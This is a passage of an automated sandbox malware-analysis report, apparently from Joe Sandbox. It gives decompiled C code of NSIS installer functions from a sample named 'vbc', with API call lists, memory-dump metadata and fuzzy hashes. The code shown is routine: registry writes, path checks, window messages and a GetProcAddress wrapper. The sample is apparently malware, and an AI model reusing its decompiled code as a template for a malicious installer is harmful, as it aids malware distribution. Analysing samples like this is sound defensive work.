				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40cddf = 1;
				 *0x40cddc = _t15 & 0x00000001;
				 *0x40cddd = _t15 & 0x00000002;
				 *0x40cdde = _t15 & 0x00000004;
				E00406557(_t9, _t31, _t33, 0x40cde4,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdc8);
				_push(_t18);
				_push(_t31);
				E00406461();
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402638
0x0040156d
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32 ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 00406557: lstrcatW.KERNEL32 ref: 004066FC
Part of subcall function 00406557: lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756

CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
Instruction ID: 0d45dbb9e622ade016cb62109ac663f1c9afcfae21dbc147df73c93619ae97e2
Opcode Fuzzy Hash: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
Instruction Fuzzy Hash: 6401D871940641EFEB006BB4AE89BDA3FB0AF15301F10493AF141B61D2C6B90404DB2C

Uniqueness

Uniqueness Score: -1.00%

Function 734F16BD Relevance: 7.5, APIs: 5, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E734F16BD(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x734f16d7
0x734f16e3
0x734f16f0
0x734f16f7
0x734f1700
0x734f170c

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,734F22D8,?,00000808), ref: 734F16D5
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,734F22D8,?,00000808), ref: 734F16DC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,734F22D8,?,00000808), ref: 734F16F0
GetProcAddress.KERNEL32(734F22D8,00000000,?,00000000,734F22D8,?,00000808), ref: 734F16F7
GlobalFree.KERNEL32(00000000), ref: 734F1700

Memory Dump Source

Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true

Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 96775bedf3ef678221b402eba9db34efd17b524b9f183c3109013a8af145cbf6
Instruction ID: 81bc5ece0a6fb62c237e185f29be97b6922663b2ae160f259f95a576c2cda87e
Opcode Fuzzy Hash: 96775bedf3ef678221b402eba9db34efd17b524b9f183c3109013a8af145cbf6
Instruction Fuzzy Hash: 05F0A2731061397FD6212AA78C4CD9B7E9CDF8B2F5B150215F61CA129089615D11D7F1

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E00406461();
				}
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 7bcf9f063f3f8c1cd6765bc74cbc29e805e6a9181adc19e22c18985f917a49b0
Instruction ID: f7a68e929e996113dc281fa05a4685e5ce16b579df1de56e4cd617e501a9a943
Opcode Fuzzy Hash: 7bcf9f063f3f8c1cd6765bc74cbc29e805e6a9181adc19e22c18985f917a49b0
Instruction Fuzzy Hash: 90219C7190421AEFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404D23 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404D23(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E00406557(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E00406557(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E00406557(_t44, _t50, 0x7a1f48, 0x7a1f48, _a8);
				wsprintfW(_t34 + lstrlenW(0x7a1f48) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x7a7a38, _a4, 0x7a1f48);
			}

0x00404d2c
0x00404d31
0x00404d39
0x00404d3a
0x00404d47
0x00404d4f
0x00404d50
0x00404d52
0x00404d54
0x00404d56
0x00404d59
0x00404d59
0x00404d60
0x00404d66
0x00404d66
0x00404d6d
0x00404d74
0x00404d77
0x00404d7a
0x00404d7a
0x00404d7e
0x00404d8e
0x00404d90
0x00404d93
0x00404d3c
0x00404d3c
0x00404d43
0x00404d43
0x00404d9b
0x00404da6
0x00404dbc
0x00404dcd
0x00404de9

APIs

lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DC4
wsprintfW.USER32 ref: 00404DCD
SetDlgItemTextW.USER32 ref: 00404DE0

Strings

%u.%u%s%s, xrefs: 00404DAE

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 1bfcb38a10210d596bf4d505370845bd3ec1d918e724b2dddb7cd3055ac07146
Instruction ID: 68f5f2c35a4a9d0707adcc228443cff0cbca91619b9e39d4db13cc85b0838dbb
Opcode Fuzzy Hash: 1bfcb38a10210d596bf4d505370845bd3ec1d918e724b2dddb7cd3055ac07146
Instruction Fuzzy Hash: C911A5736041283BDB1065ADAC45EAE329C9F86334F250237FA66F71D5EA79981182E8

Uniqueness

Uniqueness Score: -1.00%

Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2);
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5c8) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5c8 = E00402D84(3);
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5c8, 0x1800);
					}
					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5c8, _t24) == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x7a8ae8 =  *0x7a8ae8 +  *(_t39 - 4);
				return 0;
			}

0x0040248a
0x0040248a
0x0040248a
0x0040248a
0x0040248d
0x00402494
0x0040249e
0x004024a1
0x004024aa
0x004024b1
0x004024b8
0x004024bb
0x004024c1
0x004024cb
0x004024cf
0x004024da
0x004024da
0x004024e1
0x004024eb
0x004024f1
0x004024f4
0x004024f4
0x004024f8
0x00402504
0x00402504
0x0040251d
0x0040251f
0x0040251f
0x00402522
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 004024D5
RegSetValueExW.ADVAPI32 ref: 00402515
RegCloseKey.ADVAPI32(?), ref: 004025FD

Strings

C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp, xrefs: 004024C6, 004024D4, 004024EB, 004024FF, 0040250A

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp
API String ID: 2655323295-2005183556
Opcode ID: a979bc7346380cecd7475a45158651290d955060ff6c70b6f24626f2f53e06a8
Instruction ID: 3228b6dbd083cda5ecf055ca6763daeb969d91bf2f3b8010d8844d1cd476a235
Opcode Fuzzy Hash: a979bc7346380cecd7475a45158651290d955060ff6c70b6f24626f2f53e06a8
Instruction Fuzzy Hash: CF117C71E00118BEEB11AFA5DE49EAEBAB8FF44758F11443BF504B61C1D7B88D409A68

Uniqueness

Uniqueness Score: -1.00%

Function 00405EF1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405EF1(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040651A(0x7a4750, _a4);
				_t21 = E00405E94(0x7a4750);
				if(_t21 != 0) {
					E004067A1(_t21);
					if(( *0x7a8a78 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x7a4750 >> 1;
						while(1) {
							_t11 = lstrlenW(0x7a4750);
							_push(0x7a4750);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406850();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E35(0x7a4750);
								continue;
							} else {
								goto L1;
							}
						}
						E00405DE9();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405efd
0x00405f08
0x00405f0c
0x00405f13
0x00405f1f
0x00405f2f
0x00405f31
0x00405f49
0x00405f4a
0x00405f51
0x00405f52
0x00000000
0x00000000
0x00405f35
0x00405f3c
0x00405f44
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f3c
0x00405f54
0x00000000
0x00405f68
0x00405f21
0x00405f27
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f27
0x00405f0e
0x00000000

APIs

Part of subcall function 0040651A: lstrcpynW.KERNEL32(?,?,00000400,0040367A,007A7A60,NSIS Error), ref: 00406527

Part of subcall function 00405E94: CharNextW.USER32(?), ref: 00405EA2
Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EA7
Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EBF

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,7556D4C4,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F4A
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,7556D4C4,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,7556D4C4,C:\Users\user\AppData\Local\Temp\), ref: 00405F5A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405EF1
C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp, xrefs: 00405EF7, 00405EFC, 00405F02, 00405F43, 00405F49, 00405F51, 00405F59

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp
API String ID: 3248276644-675090325
Opcode ID: 6050a9c972c7e617ff80ad1598d6c44632e97a304d800cac2a50d0185b8cc685
Instruction ID: 6b34473ccab7fedc8ccd770ab5d77ed9e65f07289ecf91379f8b64e60d69f16d
Opcode Fuzzy Hash: 6050a9c972c7e617ff80ad1598d6c44632e97a304d800cac2a50d0185b8cc685
Instruction Fuzzy Hash: 64F0F43A105D5325D622333A5C09AAF1609CEC2328B19093FF992B22D1DB3CCA438D6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405E94 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E94(WCHAR* _a4) {
				WCHAR* _t5;
				short* _t7;
				WCHAR* _t10;
				short _t11;
				WCHAR* _t12;
				void* _t14;

				_t12 = _a4;
				_t10 = CharNextW(_t12);
				_t5 = CharNextW(_t10);
				_t11 =  *_t12;
				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
					if(_t11 != 0x5c || _t12[1] != _t11) {
						L10:
						return 0;
					} else {
						_t14 = 2;
						while(1) {
							_t14 = _t14 - 1;
							_t7 = E00405E16(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 2;
							if(_t14 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextW(_t5);
				}
			}

0x00405e9d
0x00405ea4
0x00405ea7
0x00405ea9
0x00405eaf
0x00405ec7
0x00405ee9
0x00000000
0x00405ecf
0x00405ed1
0x00405ed2
0x00405ed5
0x00405ed6
0x00405edf
0x00000000
0x00000000
0x00405ee2
0x00405ee5
0x00000000
0x00000000
0x00000000
0x00405ee5
0x00000000
0x00405ed2
0x00405ebe
0x00000000
0x00405ebf

APIs

CharNextW.USER32(?), ref: 00405EA2
CharNextW.USER32(00000000), ref: 00405EA7
CharNextW.USER32(00000000), ref: 00405EBF

Strings

C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp, xrefs: 00405E95

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp
API String ID: 3213498283-2005183556
Opcode ID: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
Instruction ID: c1792dff9018e3c7d7ac3158fe05bd311bc395bc4b40032904b556d4a70b82f0
Opcode Fuzzy Hash: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
Instruction Fuzzy Hash: 83F09031920F1195DB31B754CC55E7766BCEB98765B00843BE681B72C1D3B88A828AEA

Uniqueness

Uniqueness Score: -1.00%

Function 00405DE9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405DE9(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
